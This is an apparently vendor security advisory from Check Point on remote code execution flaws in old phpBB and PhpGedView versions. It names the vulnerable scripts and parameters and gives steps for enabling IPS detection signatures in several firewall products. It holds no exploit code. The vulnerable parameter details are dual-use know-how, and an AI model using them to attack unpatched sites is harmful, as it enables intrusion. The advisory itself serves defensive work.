Home Page | Skip to Navigation | Skip to Content | Skip to Search | Skip to Footer

Update Protection against phpBB and PHPGedView Remote Execution Vulnerabilities

Subscribe

Check Point Reference: CPAI-2006-005
Date Published:
Severity:
Last Updated:
Source: SANS
Security Tracker Alert ID: 1015395
Industry Reference(s): CVE-2005-4468
Protection Provided by: VPN-1
  • NGX R60
  • NG with Application Intelligence R55W
  • NG with Application Intelligence R55
  • NG with Application Intelligence R54
InterSpect
  • NGX
  • 2.0 and 1.x
Who is Vulnerable?
phpBB version 2.0.17 and prior
PhpGedView 2.x and 3.x
Vulnerability Description
phpBB is a widely used bulletin board software package. PhpGedView is a genealogy program which allows for genealogy viewing and editing on the Web. Several vulnerabilities reported in phpBB and in PhpGedView could allow an attacker to execute arbitrary PHP code.
Vulnerability Details
PhpGedView vulneravility: The 'help_text_vars.php' script does not properly validate user-supplied input in the 'PGV_BASE_DIRECTORY' parameter. A remote attacker can supply a specially crafted URL to execute arbitrary code on the target system. 

phpBB vulnerability: Input passed to the "phpbb_root_path" parameter in "admin_styles.php" is not properly sanitized prior to being used to include files. This can be exploited to include arbitrary files from external resources.

Protection Overview
The Update enables the HTTP Worm Catcher to detect and block the vulnerability based on pre-defined worm signatures.

To configure the defense, select your product from the list below and follow the related protection steps.

Additional Information
The update also includes the following protections:

  • Enhancement to the Google Talk protection (CPAI-2005-151)
  • CIFS Brute Force Attacks protection (CPSA-2006-01)

VPN-1 NGX R60

How Can I Protect My Network?
Users of VPN-1 NGX R60 should update their SmartDefense by clicking Online Update in the SmartDashboard General window.

To enable the protection:

1. On the Web Intelligence tree, click Malicious Code > General HTTP Worm Catcher.
2. Enable the following patterns:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands 
3. Install policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands 

InterSpect NGX

How Can I Protect My Network?
Users of InterSpect NGX should update their systems by selecting Profiles > SmartDefense Service and clicking Online Update.

To enable the protection:

1. In the left pane, select Profiles > Default Protection and select the Web Intelligence page of the profile.   



2. In the Web Intelligence tree, click Malicious Code > General HTTP Worm Catcher.
2. Enable the following patterns:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands
3. Install policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands

VPN-1 NG with Application Intelligence R55W

How Can I Protect My Network?
Users of VPN-1 NG with Application Intelligence R55W should update their SmartDefense by clicking Online Update in the SmartDashboard General window.

To enable the protection:

1. On the Web Intelligence tree, click Malicious Code > General HTTP Worm Catcher.
2. Enable the following patterns:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands
3. Install policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands

VPN-1 NG with Application Intelligence R55/R54

How Can I Protect My Network?
Users of VPN-1 NG with Application Intelligence R55/R54 should update their SmartDefense by clicking Update Now in the SmartDashboard General window.

To enable the protection:

1. On the SmartDefense tree, click Application Intelligence > Web and enable General HTTP Worm Catcher.
2. Enable the following patterns:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands 
3. Install security policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands 

InterSpect 2.0, 1.x

How Can I Protect My Network?
Users of InterSpect 2.0, 1.x should update their SmartDefense by clicking Online Update in the SmartDashboard General window.

To enable the protection:

1. On the SmartDefense tree, click Malicious Code > General HTTP Worm Defender.
2. Enable the following patterns:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands
3. Install policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
Generic phpBB remote execution arbitrary commands
PHPGedView Remote Execution Arbitrary Commands